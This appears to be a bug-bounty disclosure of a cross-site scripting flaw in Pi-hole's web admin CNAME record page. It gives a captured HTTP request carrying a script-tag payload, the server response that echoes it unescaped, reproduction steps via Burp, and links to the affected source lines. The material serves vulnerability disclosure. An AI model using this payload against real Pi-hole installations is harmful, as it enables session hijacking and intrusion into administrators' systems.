POST /admin/scripts/pi-hole/php/customcname.php HTTP/2
Host: pihole.example.com
Cookie: persistentlogin=***; persistentlogin=***; PHPSESSID=***
Content-Length: 109
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pihole.example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pihole.example.com/admin/cname_records.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
action=add&domain=<script>alert(1)</script>&target=a&token=***
HTTP/2 200 OK
Server: nginx/1.21.1
Date: Wed, 01 Sep 2021 10:36:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 78
Access-Control-Allow-Origin: https://pihole.example.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Pi-Hole: The Pi-hole Web interface is working!
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000
{"success":false,"message":"Domain '<script>alert(1)<\/script>' is not valid"}
Originally reported : https://huntr.dev/bounties/fa38c61f-4043-4872-bc85-7fe5ae5cc2e8/
Login as admin, Go to Local DNS -> CNAME Records -> Add a new CNAME record
Input
<script>alert(1)</script>in domain field and anything in target domain.The Payload in post body domain is URL encoded, use a proxy like burp to manually replace with the decoded value.
https://github.com/pi-hole/AdminLTE/blob/fb9bd561fdf936891370d85b32e899dff1dbf9d4/scripts/pi-hole/php/func.php#L294
https://github.com/pi-hole/AdminLTE/blob/fb9bd561fdf936891370d85b32e899dff1dbf9d4/scripts/pi-hole/php/func.php#L401
https://github.com/pi-hole/AdminLTE/blob/fb9bd561fdf936891370d85b32e899dff1dbf9d4/scripts/pi-hole/php/func.php#L312